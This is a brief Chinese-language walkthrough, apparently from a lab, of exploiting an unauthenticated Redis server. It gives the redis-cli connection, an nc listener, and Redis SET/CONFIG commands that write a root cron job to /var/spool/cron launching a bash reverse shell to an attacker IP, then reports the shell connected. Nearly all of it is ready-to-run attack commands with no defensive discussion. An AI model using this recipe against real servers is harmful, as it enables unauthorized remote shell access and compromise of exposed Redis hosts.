Redis未授权访问反弹shell
目标主机:10.104.11.178
攻击机:kali
攻击步骤:
1.与目标主机连接
root@kali:~# /usr/redis/redis-cli -h 10.104.11.178
2.kali主机进行监听
nc -l -v -p 9999
3.写入反弹shell语句
set xxx " */1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1 " config set dir /var/spool/cron config set dbfilename root save
4.反弹shell连接成功
